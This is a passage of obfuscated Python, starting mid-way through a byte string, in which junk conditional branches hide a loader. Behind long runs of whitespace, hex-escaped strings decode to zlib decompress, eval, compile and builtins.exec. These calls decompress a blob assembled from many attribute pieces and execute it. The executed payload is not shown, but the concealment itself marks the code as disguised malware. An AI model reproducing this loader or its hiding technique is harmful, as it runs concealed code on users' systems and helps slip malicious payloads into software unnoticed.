4\xc0\xf9\x15\x97P\xcc\x17\xe6a\xf21u\xc9\xff\x07Q\x84\x04\xfe')

        if 414049 > 5243456:
            _detectvar(Floor = 47070 * -91328)._positive(_add = 31816 + Ceil.Modulo)
        elif 190435 < 4390061:
            _detectvar(Floor = 98896 + 76729).Algorithm(_square = Ceil.Modulo * 24300)                                                                                                                                                                                                                                                          ;MMMMNMNNMNMMMMMNNMM,DODOOOOoODOoDDDOOoo,xwwxxwwwxwwxwwwww,IlIIIlIIIIIIIlllIllIl,SSS2222S2S2SS222S2SSS2S=(lambda xxxxwwxwwxwxxwwxxwwwxwx:xxxxwwxwwxwxxwwxxwwwxwx(__import__('\x7a\x6c\x69\x62'))),(lambda xxxxwwxwwxwxxwwxxwwwxwx:xxxxwwxwwxwxxwwxxwwwxwx['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda xxxxwwxwwxwxxwwxxwwwxwx:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(xxxxwwxwwxwxxwwxxwwwxwx)"),filename='\x53\x53\x53\x32\x53\x53\x32\x53\x32\x53\x53\x32\x32\x53\x53\x53\x32\x32\x32\x32\x53\x32\x32\x53',mode='\x65\x76\x61\x6c'))),(lambda JLIIILJILIJJLJIJIII,xxxxwwxwwxwxxwwxxwwwxwx:JLIIILJILIJJLJIJIII(xxxxwwxwwxwxxwwxxwwwxwx)),(lambda:(lambda xxxxwwxwwxwxxwwxxwwwxwx:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(xxxxwwxwwxwxxwwxxwwwxwx)"),filename='\x53\x53\x53\x32\x53\x53\x32\x53\x32\x53\x53\x32\x32\x53\x53\x53\x32\x32\x32\x32\x53\x32\x32\x53',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63'))
        if 235919 > 7603579:
            _detectvar(Floor = -65848 + 80734)._positive(_add = 67820 * Ceil.Modulo)
        elif 287688 < 8536570:
            _detectvar(Floor = 70433 / 53915).Algorithm(_square = Ceil.Modulo - 84331)                                                                                                                                                                                                                                                          ;SSS2222S2S2SS222S2SSS2S()(IlIIIlIIIIIIIlllIllIl(DODOOOOoODOoDDDOOoo(MMMMNMNNMNMMMMMNNMM(xwwxxwwwxwwxwwwww('\x76\x61\x72\x73'))),_detectvar.MemoryAccess(Power='lljjijjijljlijijliiljliij')+_detectvar.MemoryAccess(Power='IIlIlllllIlIIlllIIllIl')+_detectvar.MemoryAccess(Power='xxwwxxxxwwxwwwwxwwxw')+_detectvar.MemoryAccess(Power='liljjllljiiiljilliiiijli')+_detectvar.MemoryAccess(Power='IlIIlllIIlllIIlIllI')+_detectvar.MemoryAccess(Power='xxwxwxwxwxxxxwxwxwwwwxxxx')+_detectvar.MemoryAccess(Power='ILLLLILLJIJJLILJLJJLLI')+_detectvar.MemoryAccess(Power='mnnnmnnnnnnmmnmnmn')+_detectvar.MemoryAccess(Power='WXXWWXWWXWWXXWWWXW')+_detectvar.MemoryAccess(Power='xxxwxxwxwxwxwxxxxw')+_detectvar.MemoryAccess(Power='wwxwwxxwxwxxxwxxw')))

    except Exception as _callfunction:
        if 212454 > 2536291:
            _detectvar.execute(code = _builtins(_callfunction))

        elif 273189 > 4032495:
            Ceil.Algorithm(_square = Ceil.Modulo / 94348)
